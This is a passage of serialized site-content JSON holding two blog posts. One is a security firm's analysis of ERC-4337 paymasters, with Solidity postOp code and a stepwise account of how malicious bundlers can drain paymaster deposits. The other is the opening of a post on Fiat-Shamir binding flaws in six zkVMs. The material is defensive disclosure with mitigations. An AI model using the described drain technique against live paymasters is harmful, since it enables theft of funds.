PostOpMode",{"type":24,"tag":301,"props":113617,"children":113618},{"style":359},[113619],{"type":30,"value":377},{"type":24,"tag":301,"props":113621,"children":113622},{"style":1062},[113623],{"type":30,"value":113624},"/* mode */\n",{"type":24,"tag":301,"props":113626,"children":113627},{"class":303,"line":335},[113628,113632,113636,113641],{"type":24,"tag":301,"props":113629,"children":113630},{"style":10246},[113631],{"type":30,"value":112393},{"type":24,"tag":301,"props":113633,"children":113634},{"style":348},[113635],{"type":30,"value":109706},{"type":24,"tag":301,"props":113637,"children":113638},{"style":369},[113639],{"type":30,"value":113640}," _context",{"type":24,"tag":301,"props":113642,"children":113643},{"style":359},[113644],{"type":30,"value":1729},{"type":24,"tag":301,"props":113646,"children":113647},{"class":303,"line":344},[113648,113652,113657],{"type":24,"tag":301,"props":113649,"children":113650},{"style":10246},[113651],{"type":30,"value":96710},{"type":24,"tag":301,"props":113653,"children":113654},{"style":369},[113655],{"type":30,"value":113656}," _actualGasCost",{"type":24,"tag":301,"props":113658,"children":113659},{"style":359},[113660],{"type":30,"value":1729},{"type":24,"tag":301,"props":113662,"children":113663},{"class":303,"line":401},[113664,113668],{"type":24,"tag":301,"props":113665,"children":113666},{"style":10246},[113667],{"type":30,"value":96710},{"type":24,"tag":301,"props":113669,"children":113670},{"style":369},[113671],{"type":30,"value":113672}," _actualUserOpFeePerGas\n",{"type":24,"tag":301,"props":113674,"children":113675},{"class":303,"line":415},[113676],{"type":24,"tag":301,"props":113677,"children":113678},{"style":359},[113679],{"type":30,"value":30677},{"type":24,"tag":301,"props":113681,"children":113682},{"class":303,"line":439},[113683],{"type":24,"tag":301,"props":113684,"children":113685},{"style":348},[113686],{"type":30,"value":109745},{"type":24,"tag":301,"props":113688,"children":113689},{"class":303,"line":447},[113690],{"type":24,"tag":301,"props":113691,"children":113692},{"style":359},[113693],{"type":30,"value":35943},{"type":24,"tag":301,"props":113695,"children":113696},{"class":303,"line":476},[113697,113702,113706,113711,113715,113720],{"type":24,"tag":301,"props":113698,"children":113699},{"style":359},[113700],{"type":30,"value":113701}," ERC20PostOpContext ",{"type":24,"tag":301,"props":113703,"children":113704},{"style":348},[113705],{"type":30,"value":82685},{"type":24,"tag":301,"props":113707,"children":113708},{"style":359},[113709],{"type":30,"value":113710}," ctx ",{"type":24,"tag":301,"props":113712,"children":113713},{"style":385},[113714],{"type":30,"value":523},{"type":24,"tag":301,"props":113716,"children":113717},{"style":314},[113718],{"type":30,"value":113719}," _parsePostOpContext",{"type":24,"tag":301,"props":113721,"children":113722},{"style":359},[113723],{"type":30,"value":113724},"(_context);\n",{"type":24,"tag":301,"props":113726,"children":113727},{"class":303,"line":495},[113728],{"type":24,"tag":301,"props":113729,"children":113730},{"emptyLinePlaceholder":16},[113731],{"type":30,"value":341},{"type":24,"tag":301,"props":113733,"children":113734},{"class":303,"line":504},[113735,113739,113744,113748,113753],{"type":24,"tag":301,"props":113736,"children":113737},{"style":10246},[113738],{"type":30,"value":96710},{"type":24,"tag":301,"props":113740,"children":113741},{"style":359},[113742],{"type":30,"value":113743}," expectedPenaltyGasCost ",{"type":24,"tag":301,"props":113745,"children":113746},{"style":385},[113747],{"type":30,"value":523},{"type":24,"tag":301,"props":113749,"children":113750},{"style":314},[113751],{"type":30,"value":113752}," _expectedPenaltyGasCost",{"type":24,"tag":301,"props":113754,"children":113755},{"style":359},[113756],{"type":30,"value":1707},{"type":24,"tag":301,"props":113758,"children":113759},{"class":303,"line":512},[113760],{"type":24,"tag":301,"props":113761,"children":113762},{"style":359},[113763],{"type":30,"value":113764}," _actualGasCost, _actualUserOpFeePerGas, ctx.postOpGas, ctx.preOpGasApproximation, ctx.executionGasLimit\n",{"type":24,"tag":301,"props":113766,"children":113767},{"class":303,"line":592},[113768],{"type":24,"tag":301,"props":113769,"children":113770},{"style":359},[113771],{"type":30,"value":14559},{"type":24,"tag":301,"props":113773,"children":113774},{"class":303,"line":619},[113775],{"type":24,"tag":301,"props":113776,"children":113777},{"emptyLinePlaceholder":16},[113778],{"type":30,"value":341},{"type":24,"tag":301,"props":113780,"children":113781},{"class":303,"line":635},[113782,113786,113790,113794,113799,113803],{"type":24,"tag":301,"props":113783,"children":113784},{"style":10246},[113785],{"type":30,"value":96710},{"type":24,"tag":301,"props":113787,"children":113788},{"style":359},[113789],{"type":30,"value":110801},{"type":24,"tag":301,"props":113791,"children":113792},{"style":385},[113793],{"type":30,"value":523},{"type":24,"tag":301,"props":113795,"children":113796},{"style":359},[113797],{"type":30,"value":113798}," _actualGasCost ",{"type":24,"tag":301,"props":113800,"children":113801},{"style":385},[113802],{"type":30,"value":11206},{"type":24,"tag":301,"props":113804,"children":113805},{"style":359},[113806],{"type":30,"value":113807}," expectedPenaltyGasCost;\n",{"type":24,"tag":301,"props":113809,"children":113810},{"class":303,"line":643},[113811],{"type":24,"tag":301,"props":113812,"children":113813},{"emptyLinePlaceholder":16},[113814],{"type":30,"value":341},{"type":24,"tag":301,"props":113816,"children":113817},{"class":303,"line":652},[113818,113822,113827],{"type":24,"tag":301,"props":113819,"children":113820},{"style":10246},[113821],{"type":30,"value":96710},{"type":24,"tag":301,"props":113823,"children":113824},{"style":359},[113825],{"type":30,"value":113826}," costInToken ",{"type":24,"tag":301,"props":113828,"children":113829},{"style":385},[113830],{"type":30,"value":21485},{"type":24,"tag":301,"props":113832,"children":113833},{"class":303,"line":666},[113834,113839,113844,113848],{"type":24,"tag":301,"props":113835,"children":113836},{"style":314},[113837],{"type":30,"value":113838}," getCostInToken",{"type":24,"tag":301,"props":113840,"children":113841},{"style":359},[113842],{"type":30,"value":113843},"(actualGasCost, ctx.postOpGas, _actualUserOpFeePerGas, ctx.exchangeRate) ",{"type":24,"tag":301,"props":113845,"children":113846},{"style":385},[113847],{"type":30,"value":11206},{"type":24,"tag":301,"props":113849,"children":113850},{"style":359},[113851],{"type":30,"value":113852}," ctx.constantFee;\n",{"type":24,"tag":301,"props":113854,"children":113855},{"class":303,"line":674},[113856],{"type":24,"tag":301,"props":113857,"children":113858},{"emptyLinePlaceholder":16},[113859],{"type":30,"value":341},{"type":24,"tag":301,"props":113861,"children":113862},{"class":303,"line":692},[113863,113867,113872],{"type":24,"tag":301,"props":113864,"children":113865},{"style":10246},[113866],{"type":30,"value":96710},{"type":24,"tag":301,"props":113868,"children":113869},{"style":359},[113870],{"type":30,"value":113871}," absoluteCostInToken ",{"type":24,"tag":301,"props":113873,"children":113874},{"style":385},[113875],{"type":30,"value":21485},{"type":24,"tag":301,"props":113877,"children":113878},{"class":303,"line":3631},[113879,113884,113888,113893,113897,113901,113905,113909,113913,113917,113921],{"type":24,"tag":301,"props":113880,"children":113881},{"style":359},[113882],{"type":30,"value":113883}," costInToken ",{"type":24,"tag":301,"props":113885,"children":113886},{"style":385},[113887],{"type":30,"value":1456},{"type":24,"tag":301,"props":113889,"children":113890},{"style":359},[113891],{"type":30,"value":113892}," ctx.preFundCharged ",{"type":24,"tag":301,"props":113894,"children":113895},{"style":385},[113896],{"type":30,"value":2003},{"type":24,"tag":301,"props":113898,"children":113899},{"style":359},[113900],{"type":30,"value":113826},{"type":24,"tag":301,"props":113902,"children":113903},{"style":385},[113904],{"type":30,"value":9253},{"type":24,"tag":301,"props":113906,"children":113907},{"style":359},[113908],{"type":30,"value":113892},{"type":24,"tag":301,"props":113910,"children":113911},{"style":385},[113912],{"type":30,"value":1679},{"type":24,"tag":301,"props":113914,"children":113915},{"style":359},[113916],{"type":30,"value":113892},{"type":24,"tag":301,"props":113918,"children":113919},{"style":385},[113920],{"type":30,"value":9253},{"type":24,"tag":301,"props":113922,"children":113923},{"style":359},[113924],{"type":30,"value":113925}," costInToken;\n",{"type":24,"tag":301,"props":113927,"children":113928},{"class":303,"line":3639},[113929],{"type":24,"tag":301,"props":113930,"children":113931},{"emptyLinePlaceholder":16},[113932],{"type":30,"value":341},{"type":24,"tag":301,"props":113934,"children":113935},{"class":303,"line":3647},[113936,113941,113945],{"type":24,"tag":301,"props":113937,"children":113938},{"style":359},[113939],{"type":30,"value":113940}," SafeTransferLib.",{"type":24,"tag":301,"props":113942,"children":113943},{"style":314},[113944],{"type":30,"value":110332},{"type":24,"tag":301,"props":113946,"children":113947},{"style":359},[113948],{"type":30,"value":1707},{"type":24,"tag":301,"props":113950,"children":113951},{"class":303,"line":3685},[113952],{"type":24,"tag":301,"props":113953,"children":113954},{"style":359},[113955],{"type":30,"value":113956}," ctx.token,\n",{"type":24,"tag":301,"props":113958,"children":113959},{"class":303,"line":3713},[113960,113964,113968,113972,113976,113981,113985],{"type":24,"tag":301,"props":113961,"children":113962},{"style":359},[113963],{"type":30,"value":113883},{"type":24,"tag":301,"props":113965,"children":113966},{"style":385},[113967],{"type":30,"value":1456},{"type":24,"tag":301,"props":113969,"children":113970},{"style":359},[113971],{"type":30,"value":113892},{"type":24,"tag":301,"props":113973,"children":113974},{"style":385},[113975],{"type":30,"value":2003},{"type":24,"tag":301,"props":113977,"children":113978},{"style":359},[113979],{"type":30,"value":113980}," ctx.sender ",{"type":24,"tag":301,"props":113982,"children":113983},{"style":385},[113984],{"type":30,"value":1679},{"type":24,"tag":301,"props":113986,"children":113987},{"style":359},[113988],{"type":30,"value":113989}," ctx.treasury,\n",{"type":24,"tag":301,"props":113991,"children":113992},{"class":303,"line":3721},[113993,113997,114001,114005,114009,114014,114018],{"type":24,"tag":301,"props":113994,"children":113995},{"style":359},[113996],{"type":30,"value":113883},{"type":24,"tag":301,"props":113998,"children":113999},{"style":385},[114000],{"type":30,"value":1456},{"type":24,"tag":301,"props":114002,"children":114003},{"style":359},[114004],{"type":30,"value":113892},{"type":24,"tag":301,"props":114006,"children":114007},{"style":385},[114008],{"type":30,"value":2003},{"type":24,"tag":301,"props":114010,"children":114011},{"style":359},[114012],{"type":30,"value":114013}," ctx.treasury ",{"type":24,"tag":301,"props":114015,"children":114016},{"style":385},[114017],{"type":30,"value":1679},{"type":24,"tag":301,"props":114019,"children":114020},{"style":359},[114021],{"type":30,"value":114022}," ctx.sender,\n",{"type":24,"tag":301,"props":114024,"children":114025},{"class":303,"line":3751},[114026],{"type":24,"tag":301,"props":114027,"children":114028},{"style":359},[114029],{"type":30,"value":114030}," absoluteCostInToken\n",{"type":24,"tag":301,"props":114032,"children":114033},{"class":303,"line":3782},[114034],{"type":24,"tag":301,"props":114035,"children":114036},{"style":359},[114037],{"type":30,"value":14559},{"type":24,"tag":301,"props":114039,"children":114040},{"class":303,"line":3791},[114041],{"type":24,"tag":301,"props":114042,"children":114043},{"emptyLinePlaceholder":16},[114044],{"type":30,"value":341},{"type":24,"tag":301,"props":114046,"children":114047},{"class":303,"line":3819},[114048,114052,114057,114061,114066,114070,114075,114079,114084],{"type":24,"tag":301,"props":114049,"children":114050},{"style":10246},[114051],{"type":30,"value":96710},{"type":24,"tag":301,"props":114053,"children":114054},{"style":359},[114055],{"type":30,"value":114056}," preFundInToken ",{"type":24,"tag":301,"props":114058,"children":114059},{"style":385},[114060],{"type":30,"value":523},{"type":24,"tag":301,"props":114062,"children":114063},{"style":359},[114064],{"type":30,"value":114065}," (ctx.preFund ",{"type":24,"tag":301,"props":114067,"children":114068},{"style":385},[114069],{"type":30,"value":772},{"type":24,"tag":301,"props":114071,"children":114072},{"style":359},[114073],{"type":30,"value":114074}," ctx.exchangeRate) ",{"type":24,"tag":301,"props":114076,"children":114077},{"style":385},[114078],{"type":30,"value":1036},{"type":24,"tag":301,"props":114080,"children":114081},{"style":466},[114082],{"type":30,"value":114083}," 1e18",{"type":24,"tag":301,"props":114085,"children":114086},{"style":359},[114087],{"type":30,"value":492},{"type":24,"tag":301,"props":114089,"children":114090},{"class":303,"line":4397},[114091],{"type":24,"tag":301,"props":114092,"children":114093},{"emptyLinePlaceholder":16},[114094],{"type":30,"value":341},{"type":24,"tag":301,"props":114096,"children":114097},{"class":303,"line":4405},[114098,114102,114107,114111,114115,114119,114123,114127,114131,114135,114139],{"type":24,"tag":301,"props":114099,"children":114100},{"style":308},[114101],{"type":30,"value":3285},{"type":24,"tag":301,"props":114103,"children":114104},{"style":359},[114105],{"type":30,"value":114106}," (ctx.recipient ",{"type":24,"tag":301,"props":114108,"children":114109},{"style":385},[114110],{"type":30,"value":463},{"type":24,"tag":301,"props":114112,"children":114113},{"style":10246},[114114],{"type":30,"value":13069},{"type":24,"tag":301,"props":114116,"children":114117},{"style":359},[114118],{"type":30,"value":362},{"type":24,"tag":301,"props":114120,"children":114121},{"style":466},[114122],{"type":30,"value":584},{"type":24,"tag":301,"props":114124,"children":114125},{"style":359},[114126],{"type":30,"value":911},{"type":24,"tag":301,"props":114128,"children":114129},{"style":385},[114130],{"type":30,"value":5639},{"type":24,"tag":301,"props":114132,"children":114133},{"style":359},[114134],{"type":30,"value":114056},{"type":24,"tag":301,"props":114136,"children":114137},{"style":385},[114138],{"type":30,"value":1456},{"type":24,"tag":301,"props":114140,"children":114141},{"style":359},[114142],{"type":30,"value":114143}," costInToken) {\n",{"type":24,"tag":301,"props":114145,"children":114146},{"class":303,"line":4422},[114147,114152,114156,114161,114165],{"type":24,"tag":301,"props":114148,"children":114149},{"style":359},[114150],{"type":30,"value":114151}," SafeTransferLib.",{"type":24,"tag":301,"props":114153,"children":114154},{"style":314},[114155],{"type":30,"value":110332},{"type":24,"tag":301,"props":114157,"children":114158},{"style":359},[114159],{"type":30,"value":114160},"(ctx.token, ctx.sender, ctx.recipient, preFundInToken ",{"type":24,"tag":301,"props":114162,"children":114163},{"style":385},[114164],{"type":30,"value":9253},{"type":24,"tag":301,"props":114166,"children":114167},{"style":359},[114168],{"type":30,"value":114169}," costInToken);\n",{"type":24,"tag":301,"props":114171,"children":114172},{"class":303,"line":4438},[114173],{"type":24,"tag":301,"props":114174,"children":114175},{"style":359},[114176],{"type":30,"value":3345},{"type":24,"tag":301,"props":114178,"children":114179},{"class":303,"line":4446},[114180],{"type":24,"tag":301,"props":114181,"children":114182},{"emptyLinePlaceholder":16},[114183],{"type":30,"value":341},{"type":24,"tag":301,"props":114185,"children":114186},{"class":303,"line":4506},[114187,114192,114196],{"type":24,"tag":301,"props":114188,"children":114189},{"style":308},[114190],{"type":30,"value":114191}," emit",{"type":24,"tag":301,"props":114193,"children":114194},{"style":314},[114195],{"type":30,"value":111066},{"type":24,"tag":301,"props":114197,"children":114198},{"style":359},[114199],{"type":30,"value":114200},"(ctx.userOpHash, ctx.sender, ERC20_MODE, ctx.token, costInToken, ctx.exchangeRate);\n",{"type":24,"tag":301,"props":114202,"children":114203},{"class":303,"line":4566},[114204],{"type":24,"tag":301,"props":114205,"children":114206},{"style":359},[114207],{"type":30,"value":501},{"type":24,"tag":32,"props":114209,"children":114210},{},[114211,114213,114218,114220,114226,114228,114234,114236,114241,114243,114248],{"type":30,"value":114212},"As shown above, the paymaster calculates the actual gas used and attempts to charge the user by calling ",{"type":24,"tag":145,"props":114214,"children":114216},{"className":114215},[],[114217],{"type":30,"value":110332},{"type":30,"value":114219},". Note that ",{"type":24,"tag":145,"props":114221,"children":114223},{"className":114222},[],[114224],{"type":30,"value":114225},"preFundCharged",{"type":30,"value":114227}," can be zero, as users can opt out of any ",{"type":24,"tag":145,"props":114229,"children":114231},{"className":114230},[],[114232],{"type":30,"value":114233},"preFund",{"type":30,"value":114235}," during the validation phase. If the user hasn't given sufficient allowance to Pimlico's paymaster for the transfer, the ",{"type":24,"tag":145,"props":114237,"children":114239},{"className":114238},[],[114240],{"type":30,"value":111133},{"type":30,"value":114242}," call inside ",{"type":24,"tag":145,"props":114244,"children":114246},{"className":114245},[],[114247],{"type":30,"value":112217},{"type":30,"value":114249}," will revert and the paymaster won't be able to collect payment from the user.",{"type":24,"tag":32,"props":114251,"children":114252},{},[114253,114255,114260,114262,114268,114270,114276],{"type":30,"value":114254},"However, even when ",{"type":24,"tag":145,"props":114256,"children":114258},{"className":114257},[],[114259],{"type":30,"value":111133},{"type":30,"value":114261}," fails, the EntryPoint will still complete the execution and pay the bundler who submitted it. Importantly, this payment comes from the paymaster's deposit, since during validation the ",{"type":24,"tag":145,"props":114263,"children":114265},{"className":114264},[],[114266],{"type":30,"value":114267},"requiredPrefund",{"type":30,"value":114269}," was taken from the paymaster's ",{"type":24,"tag":188,"props":114271,"children":114274},{"href":114272,"rel":114273},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L625-L627",[192],[114275],{"type":30,"value":68675},{"type":30,"value":206},{"type":24,"tag":32,"props":114278,"children":114279},{},[114280,114282,114287],{"type":30,"value":114281},"This creates a critical vulnerability for paymasters that implement post-execution charging patterns. Even if the ",{"type":24,"tag":145,"props":114283,"children":114285},{"className":114284},[],[114286],{"type":30,"value":111133},{"type":30,"value":114288}," call fails (meaning the paymaster couldn't collect payment from the user), the paymaster still has to pay the bundler's gas costs from their deposited funds. This vulnerability can be exploited by malicious bundlers in the following way:",{"type":24,"tag":6246,"props":114290,"children":114291},{},[114292,114310,114329,114340,114345],{"type":24,"tag":2659,"props":114293,"children":114294},{},[114295,114297,114302,114304],{"type":30,"value":114296},"The bundler creates a ",{"type":24,"tag":145,"props":114298,"children":114300},{"className":114299},[],[114301],{"type":30,"value":108878},{"type":30,"value":114303}," with an intentionally high ",{"type":24,"tag":145,"props":114305,"children":114307},{"className":114306},[],[114308],{"type":30,"value":114309},"gasPrice",{"type":24,"tag":2659,"props":114311,"children":114312},{},[114313,114315,114320,114322,114327],{"type":30,"value":114314},"The bundler ensures the ",{"type":24,"tag":145,"props":114316,"children":114318},{"className":114317},[],[114319],{"type":30,"value":111133},{"type":30,"value":114321}," call will fail by revoking the paymaster's token allowance before ",{"type":24,"tag":145,"props":114323,"children":114325},{"className":114324},[],[114326],{"type":30,"value":111133},{"type":30,"value":114328}," executes",{"type":24,"tag":2659,"props":114330,"children":114331},{},[114332,114333,114338],{"type":30,"value":70067},{"type":24,"tag":145,"props":114334,"children":114336},{"className":114335},[],[114337],{"type":30,"value":111133},{"type":30,"value":114339}," fails, the bundler still gets paid their high gas costs by the paymaster",{"type":24,"tag":2659,"props":114341,"children":114342},{},[114343],{"type":30,"value":114344},"The paymaster loses money since they paid the bundler but couldn't collect from the user",{"type":24,"tag":2659,"props":114346,"children":114347},{},[114348],{"type":30,"value":114349},"The bundler profits as long as their actual gas costs are less than what they charged",{"type":24,"tag":32,"props":114351,"children":114352},{},[114353,114355,114360,114362,114367],{"type":30,"value":114354},"This effectively allows bundlers to drain paymaster deposits by submitting ",{"type":24,"tag":145,"props":114356,"children":114358},{"className":114357},[],[114359],{"type":30,"value":108907},{"type":30,"value":114361}," designed to fail during ",{"type":24,"tag":145,"props":114363,"children":114365},{"className":114364},[],[114366],{"type":30,"value":111133},{"type":30,"value":114368}," while maximizing the gas costs they can charge to the paymaster.",{"type":24,"tag":32,"props":114370,"children":114371},{},[114372,114374,114379,114381,114386,114388,114394,114396,114401],{"type":30,"value":114373},"Some paymasters try to protect against this by simulating the ",{"type":24,"tag":145,"props":114375,"children":114377},{"className":114376},[],[114378],{"type":30,"value":108878},{"type":30,"value":114380}," execution before signing and allowing it to be submitted. However, this protection can be easily bypassed because an attacker can simply approve the required token allowance during simulation to pass validation, but then revoke the allowance just before the ",{"type":24,"tag":145,"props":114382,"children":114384},{"className":114383},[],[114385],{"type":30,"value":108878},{"type":30,"value":114387}," is submitted via ",{"type":24,"tag":145,"props":114389,"children":114391},{"className":114390},[],[114392],{"type":30,"value":114393},"handleOps",{"type":30,"value":114395},". This means the ",{"type":24,"tag":145,"props":114397,"children":114399},{"className":114398},[],[114400],{"type":30,"value":111133},{"type":30,"value":114402}," will pass simulation but fail during actual execution, allowing the bundler to drain the paymaster's deposit from the EntryPoint.",{"type":24,"tag":32,"props":114404,"children":114405},{},[114406],{"type":30,"value":114407},"To protect against this vulnerability, paymasters should implement pre-execution charging patterns rather than post-execution charging. This means requiring users to pre-fund the full estimated gas cost during the validation phase, before the operation executes. By collecting payment upfront, the paymaster is protected against failed post-execution transfers that could be exploited by malicious bundlers.",{"type":24,"tag":32,"props":114409,"children":114410},{},[114411],{"type":30,"value":114412},"If post-execution charging is absolutely necessary for UX reasons, paymasters have several mitigation strategies available. One approach is to restrict usage to a whitelist of trusted bundlers, though this introduces centralization concerns. Alternatively, Pimlico tries to address this issue by tightening API limits and constraining ERC-20 usage for its users.",{"type":24,"tag":32,"props":114414,"children":114415},{},[114416],{"type":30,"value":114417},"The most secure approach is to require upfront pre-funding, even though it may temporarily lock more user funds. This small UX tradeoff is worth the strong security guarantees it provides against paymaster exploitation.",{"type":24,"tag":25,"props":114419,"children":114420},{"id":9652},[114421],{"type":30,"value":9655},{"type":24,"tag":32,"props":114423,"children":114424},{},[114425],{"type":30,"value":114426},"ERC-4337 paymasters enable powerful new UX patterns by abstracting away gas costs from end users. However, implementing them securely requires careful consideration of the standard's execution flow and potential attack vectors. The key lessons are:",{"type":24,"tag":6246,"props":114428,"children":114429},{},[114430,114435,114440,114445,114450],{"type":24,"tag":2659,"props":114431,"children":114432},{},[114433],{"type":30,"value":114434},"Always collect full payment during validation, not after execution",{"type":24,"tag":2659,"props":114436,"children":114437},{},[114438],{"type":30,"value":114439},"Be conservative with gas estimations and include safety margins",{"type":24,"tag":2659,"props":114441,"children":114442},{},[114443],{"type":30,"value":114444},"Carefully validate all user inputs and token transfers",{"type":24,"tag":2659,"props":114446,"children":114447},{},[114448],{"type":30,"value":114449},"Test extensively, including simulation of malicious behavior",{"type":24,"tag":2659,"props":114451,"children":114452},{},[114453,114455,114460],{"type":30,"value":114454},"Always review changes in new ",{"type":24,"tag":145,"props":114456,"children":114458},{"className":114457},[],[114459],{"type":30,"value":108959},{"type":30,"value":114461}," versions, as they may impact your paymaster's design and security assumptions",{"type":24,"tag":32,"props":114463,"children":114464},{},[114465,114467,114472,114474,114479,114481,114486],{"type":30,"value":114466},"The last point is particularly important as the ERC-4337 standard continues to evolve. Changes to the ",{"type":24,"tag":145,"props":114468,"children":114470},{"className":114469},[],[114471],{"type":30,"value":108959},{"type":30,"value":114473}," contract's behavior could potentially break existing ",{"type":24,"tag":145,"props":114475,"children":114477},{"className":114476},[],[114478],{"type":30,"value":109030},{"type":30,"value":114480}," implementations or introduce new security considerations. Developers should thoroughly review release notes and diffs when upgrading to new ",{"type":24,"tag":145,"props":114482,"children":114484},{"className":114483},[],[114485],{"type":30,"value":108959},{"type":30,"value":114487}," versions.",{"type":24,"tag":32,"props":114489,"children":114490},{},[114491],{"type":30,"value":114492},"By following these best practices, developers can build robust paymasters that enhance UX while protecting against exploitation. As the ERC-4337 ecosystem matures, secure paymaster implementations will be crucial for driving mainstream adoption of account abstraction.",{"type":24,"tag":32,"props":114494,"children":114495},{},[114496],{"type":30,"value":114497},"If you're building a paymaster and want to ensure it's secure against these and other vulnerabilities, consider getting an audit from us. Our team has extensive experience auditing ERC-4337 implementations and can help identify potential security issues before they impact production.",{"type":24,"tag":9672,"props":114499,"children":114500},{},[114501],{"type":30,"value":9676},{"title":7,"searchDepth":320,"depth":320,"links":114503},[114504,114505,114506,114513,114518,114519],{"id":108793,"depth":320,"text":108796},{"id":108809,"depth":320,"text":108812},{"id":108848,"depth":320,"text":108851,"children":114507},[114508,114509,114510,114511,114512],{"id":108871,"depth":335,"text":108878},{"id":108912,"depth":335,"text":108915},{"id":108938,"depth":335,"text":108941},{"id":21515,"depth":335,"text":108959},{"id":109030,"depth":335,"text":109041},{"id":109092,"depth":320,"text":114514,"children":114515},"Understanding the EntryPoint's Flow",[114516,114517],{"id":109148,"depth":335,"text":109151},{"id":109333,"depth":335,"text":109336},{"id":109576,"depth":320,"text":109582},{"id":111176,"depth":320,"text":111182,"children":114520},[114521,114522],{"id":111236,"depth":335,"text":111239},{"id":111296,"depth":335,"text":111299},"content:blog:2025-12-02-paymasters-evm.md","blog/2025-12-02-paymasters-evm.md","blog/2025-12-02-paymasters-evm",{"_path":114527,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":114528,"description":114529,"date":114530,"author":114531,"image":114534,"isFeatured":16,"onBlogPage":16,"tags":114536,"body":114538,"_type":9700,"_id":130340,"_source":9702,"_file":130341,"_stem":130342,"_extension":9705},"/blog/2026-03-03-zkvms-unfaithful-claims","Unfaithful Claims: Breaking 6 zkVMs","A zkVM verifier should be faithful to one thing above all else: its public claims. Yet we found six systems where this guarantee breaks. Learn how a subtle ordering bug lets an attacker bypass the cryptography entirely and prove mathematically impossible statements.","2026-03-03T12:00:00.000Z",[114532,114533],"himanshu","valter",{"src":114535,"width":14,"height":15},"/posts/zkvms-unfaithful-claims/title.png",[114537],"zkVM",{"type":21,"children":114539,"toc":130304},[114540,114545,114587,114600,114603,114609,114614,114742,114745,114751,114757,114762,114794,114942,114947,115070,115081,115092,115115,115126,115131,115164,115172,115177,115180,115186,115191,115197,115202,115207,115215,115233,115374,115379,115385,115478,116211,116279,116290,116298,116772,116778,117217,117557,117710,117715,118603,118759,118765,118857,118862,119447,119897,119973,119979,119984,120052,120062,120078,120088,120149,120568,120600,120610,120785,120790,120800,121400,121588,121606,121609,121615,121620,121628,121660,122022,122027,122112,122115,122121,122129,122134,122137,122143,122148,122156,122164,122172,122180,122213,122221,122229,122320,122571,122898,122906,122936,123106,123432,123437,123442,123459,123462,123467,123472,123484,123496,124087,124099,124111,124118,124126,124138,124146,124161,124166,124446,124465,124560,124579,124595,124598,124604,124609,124614,124621,124629,124636,124644,124657,124675,125135,125237,125242,125247,125263,125266,125272,125277,125289,125300,125305,125694,125701,125709,125734,125754,126010,126021,126040,126424,126770,127000,127159,127319,127887,127892,127918,127921,127927,127932,127939,127947,127960,128032,128043,128051,128061,128069,128080,128354,128443,128472,128475,128480,128614,128626,128633,128638,128791,128817,128824,128832,128837,128903,128908,129298,129385,129401,129404,129410,129415,129421,129521,129580,129585,129591,129596,129604,129609,129615,129620,129625,129631,129636,129639,129645,129651,129656,129661,129666,129671,129676,129679,129685,129848,129853,129856,129861,129872,130189,130194,130218,130223,130241,130246,130249,130255,130260,130265,130275,130280,130290,130300],{"type":24,"tag":32,"props":114541,"children":114542},{},[114543],{"type":30,"value":114544},"A zkVM verifier should be faithful to one thing above all else: its public claims. If the claimed input/output statement is false, verification must fail.",{"type":24,"tag":32,"props":114546,"children":114547},{},[114548,114550,114555,114556,114561,114562,114567,114568,114573,114574,114579,114580,114585],{"type":30,"value":114549},"We found six systems where this faithfulness breaks. Across ",{"type":24,"tag":60,"props":114551,"children":114552},{},[114553],{"type":30,"value":114554},"Jolt",{"type":30,"value":377},{"type":24,"tag":60,"props":114557,"children":114558},{},[114559],{"type":30,"value":114560},"Nexus",{"type":30,"value":377},{"type":24,"tag":60,"props":114563,"children":114564},{},[114565],{"type":30,"value":114566},"Cairo-M",{"type":30,"value":377},{"type":24,"tag":60,"props":114569,"children":114570},{},[114571],{"type":30,"value":114572},"Ceno",{"type":30,"value":377},{"type":24,"tag":60,"props":114575,"children":114576},{},[114577],{"type":30,"value":114578},"Expander",{"type":30,"value":8410},{"type":24,"tag":60,"props":114581,"children":114582},{},[114583],{"type":30,"value":114584},"Binius64",{"type":30,"value":114586},", public-claim data was not always bound into Fiat-Shamir transcripts before challenge generation. That subtle ordering bug turns statement values into attacker-controlled variables in later verification equations.",{"type":24,"tag":32,"props":114588,"children":114589},{},[114590,114592,114598],{"type":30,"value":114591},"In this post, we demonstrate how to exploit these unbound variables to bypass the cryptography entirely and prove mathematically impossible statements, such as finding a counterexample to Fermat's Last Theorem (see ",{"type":24,"tag":188,"props":114593,"children":114595},{"href":114594},"#challenges",[114596],{"type":30,"value":114597},"Challenges",{"type":30,"value":114599}," to try this out yourself). In a blockchain context, this could translate to receiving $1M out of thin air.",{"type":24,"tag":2719,"props":114601,"children":114602},{},[],{"type":24,"tag":43,"props":114604,"children":114606},{"id":114605},"jargon-cheat-sheet",[114607],{"type":30,"value":114608},"Jargon Cheat Sheet",{"type":24,"tag":32,"props":114610,"children":114611},{},[114612],{"type":30,"value":114613},"Before we go deeper, here's a one-liner for every term you'll encounter. The ZK ecosystem is particularly full of jargon and abbreviations, which may be off-putting to newcomers. Bookmark this section.",{"type":24,"tag":2655,"props":114615,"children":114616},{},[114617,114627,114637,114647,114657,114667,114677,114687,114697,114707,114717,114727],{"type":24,"tag":2659,"props":114618,"children":114619},{},[114620,114625],{"type":24,"tag":60,"props":114621,"children":114622},{},[114623],{"type":30,"value":114624},"Fiat-Shamir",{"type":30,"value":114626},": Instead of a real verifier sending random challenges, hash everything so far to get \"random\" challenges. Makes proofs non-interactive.",{"type":24,"tag":2659,"props":114628,"children":114629},{},[114630,114635],{"type":24,"tag":60,"props":114631,"children":114632},{},[114633],{"type":30,"value":114634},"Transcript",{"type":30,"value":114636},": The running hash state. You \"absorb\" data into it, then \"squeeze\" out challenges.",{"type":24,"tag":2659,"props":114638,"children":114639},{},[114640,114645],{"type":24,"tag":60,"props":114641,"children":114642},{},[114643],{"type":30,"value":114644},"Polynomial Commitment",{"type":30,"value":114646},": Like a hash, but for polynomials. You commit to a polynomial, then later prove \"my polynomial evaluates to 42 at point 7\" without revealing the whole polynomial.",{"type":24,"tag":2659,"props":114648,"children":114649},{},[114650,114655],{"type":24,"tag":60,"props":114651,"children":114652},{},[114653],{"type":30,"value":114654},"Sumcheck",{"type":30,"value":114656},": A protocol to prove \"this polynomial sums to H over all boolean inputs\" without actually computing the exponentially many terms. Reduces to checking one random point.",{"type":24,"tag":2659,"props":114658,"children":114659},{},[114660,114665],{"type":24,"tag":60,"props":114661,"children":114662},{},[114663],{"type":30,"value":114664},"MLE (Multilinear Extension)",{"type":30,"value":114666},": Turn a table of values into a polynomial. The polynomial equals the table on 0/1 inputs and smoothly interpolates elsewhere. Key 